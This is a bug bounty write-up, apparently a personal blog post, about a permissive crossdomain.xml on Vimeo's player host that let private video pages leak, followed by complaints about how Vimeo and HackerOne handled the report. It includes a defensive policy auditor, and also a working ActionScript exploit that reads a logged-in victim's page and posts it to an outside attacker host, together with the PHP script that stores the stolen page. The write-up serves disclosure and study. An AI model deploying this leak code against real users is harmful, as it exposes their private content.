Today, I’ll talk about one of my worst experiences in bug bounty programs with Vimeo’s security team.

First, if you don’t know Vimeo:
Vimeo (/ˈvɪmioʊ/) is a video-sharing website in which users can upload, share and view videos. It was the first video sharing site to support high-definition video (started in October 2007). Vimeo was founded in November 2004 by Jake Lodwick and Zach Klein. [wiki]


They started their BB program on HackerOne 2 years ago.

I hadn’t been very active in BB programs at the time, but I saw they paid $600 for “Private videos disclosure” and “CSRF on Vimeo leading to private videos go public”, so I accepted the challenge. The target wasn’t finding an XSS or a harmless CSRF, but finding a way to leak the private videos, since they don’t pay well for XSS or other bugs: you get marked duplicate, or a mini bounty for a lot of wasted time.

So I started by reading old reports related to this goal. Almost every report was about crossdomain.xml misconfiguration, so I focused on this file across Vimeo’s sites.
In their rules there is a point about crossdomain.xml: it has to be exploitable, not just a finding:
* Reports of insecure crossdomain.xml configuration (again, unless you have a working proof of concept – and not just a report from a scanner).

So I started looking for this file across their sites and tried to find a way to exploit it. I found one here:

https://player.vimeo.com/crossdomain.xml

It allows any domain to send requests to this host, so the first step of the exploit is fine, but on its own we can’t call it a security issue, since the player is meant to work on other hosts.
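To make the difference between “the player works on other hosts” and “any origin can read authenticated responses” concrete, here is a small policy auditor I added for this post (it is not Vimeo’s code or anything from the original report). Both policies below are constructed samples: the first has the shape of the wildcard policy found on player.vimeo.com, the second is the restricted form a host that serves authenticated content should use.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape of the wildcard policy the post describes
# on player.vimeo.com; it is not the live file.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>"""

# Constructed sample of the corrected form: only the origin that needs it,
# over HTTPS only, and no other policy files honoured on the host.
RESTRICTED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.example.com" secure="true"/>
</cross-domain-policy>"""


def audit_crossdomain(xml_text):
    """Return a list of findings for a Flash crossdomain.xml policy.

    Each finding describes a setting that lets a SWF served from another
    origin read this host's responses with the visitor's cookies attached,
    which is exactly the primitive a cross-domain leak needs.
    """
    findings = []
    root = ET.fromstring(xml_text)
    for sc in root.iter("site-control"):
        if sc.get("permitted-cross-domain-policies") == "all":
            findings.append("site-control: policy files anywhere on the host are honoured")
    for rule in root.iter("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            findings.append('allow-access-from domain="*": any origin can read responses')
        elif domain.startswith("*."):
            findings.append(f"wildcard subdomain rule {domain}: every subdomain is trusted")
        # Adobe's default for secure is true on an HTTPS policy file.
        if rule.get("secure", "true").lower() == "false":
            findings.append(f'secure="false" on {domain}: plain-HTTP SWFs may read HTTPS content')
    for hdr in root.iter("allow-http-request-headers-from"):
        if hdr.get("domain") == "*":
            findings.append("allow-http-request-headers-from: any origin may send custom headers")
    return findings


def leaks_authenticated_content(xml_text):
    """True when the policy lets arbitrary origins read cookie-authenticated pages."""
    return any("any origin can read" in f for f in audit_crossdomain(xml_text))
```

The point of the check is the combination the post relies on: a wildcard `allow-access-from` on a host that also decides what to return based on the user’s session cookie.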

I dug in to see what could be leaked: a CSRF token, a username, an email, etc.
After a series of tests, I found that player.vimeo.com checks the user’s cookie to tell whether they are logged in, and then shows them the private video if they have permission to watch it.
I was using two browsers: Chrome for an unauthenticated user, and Firefox for the user user36551307.

I uploaded a video and set its privacy to “Only me”. Here’s the link: https://player.vimeo.com/video/182118182

When I opened it using FF, I got the following:

[screenshot: player page as seen by the authenticated Firefox user]


Different from Chrome:

[screenshot: player page as seen by the unauthenticated Chrome user]

So the page’s source depends on the user’s authentication state, and it can be leaked either way.

Next, I needed to write a Flash file that sends a request to this URL and leaks the page’s source, and then see whether, given that source, we can play the video. I copied the source of the HTML page, saved it on my PC as something like test.html, and it worked!

I called it leak.swf; then I needed to modify the Flash file’s readFrom:String and sendTo:String values.

package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLLoader;

 public class XDomainXploit extends Sprite {
  public function XDomainXploit() {
   // URL of the private video, fetched with the viewer's own cookies
   var readFrom:String = "https://player.vimeo.com/video/182118182";
   var readRequest:URLRequest = new URLRequest(readFrom);
   var getLoader:URLLoader = new URLLoader();
   getLoader.addEventListener(Event.COMPLETE, eventHandler);
   try {
    getLoader.load(readRequest);
   } catch (error:Error) {
    trace("Error loading URL: " + error);
   }
  }

  // Called once the player page has been read; forwards its body
  private function eventHandler(event:Event):void {
   // URL on the attacker origin that stores the leaked page
   var sendTo:String = "http://xxe-me.esy.es/video.php";
   var sendRequest:URLRequest = new URLRequest(sendTo);
   sendRequest.method = URLRequestMethod.POST;
   sendRequest.data = event.target.data;
   var sendLoader:URLLoader = new URLLoader();
   try {
    sendLoader.load(sendRequest);
   } catch (error:Error) {
    trace("Error loading URL: " + error);
   }
  }
 }
}

I set those to the video URL and my host’s URL. The SWF sends the source of the Vimeo player page to video.php, which saves it as a new HTML page.

The video.php source code:

<?php
// Raw POST body sent by leak.swf: the player page's HTML
$data = file_get_contents("php://input");
// Returns the number of bytes written, or false on failure
$page_content = file_put_contents('private_video.html', $data, FILE_APPEND | LOCK_EX);
if ($page_content === false) {
 die("Didn't work!");
}
else {
 echo "$page_content bytes written, exploited!";
}
?>


When video.php receives the page source from leak.swf, it creates an HTML page called private_video.html containing that source.

I built a full PoC; here is the PoC video:


Everything worked just fine. I wrote a good report with the PoC, code, steps, and technical details. I got a bot response saying this is not an issue, please provide a working PoC. I already had, but I sent the video one more time.

Two days later, the team closed the report as “Informative” with this reply:

Thanks for your report. We are aware of this. This is how we allow custom flash players to work.

I was puzzled why they closed this. It is 100% a security issue. I replied again, requesting public disclosure of this report.

I waited for days and then requested mediation from HackerOne Support. 30 days later, H1 support told me that the Vimeo team had pushed the public disclosure out by 2 days and it should be published by then. I had to wait to see the H1 community’s reaction. Two more days passed and nothing happened; I waited 10 more days, and since it still wasn’t published, I contacted H1 support again. They replied with this:

[screenshot: reply from HackerOne support]

So Vimeo’s team never replied to me in the report; they didn’t fix it or contact me for months, and now they want 60 more days after I requested PD. On top of all this, the report was closed as “Informative”, and the H1 team had nothing in hand to do. So I wrote this post to show that we don’t live in BB heaven. By the way, this isn’t the first time for Vimeo’s team; here is another report with no bounty and no respectful reply: Report.

Tell me what you think about this in the comments, or contact me on my Twitter account @Abdulahhusam. Thank you for reading it all.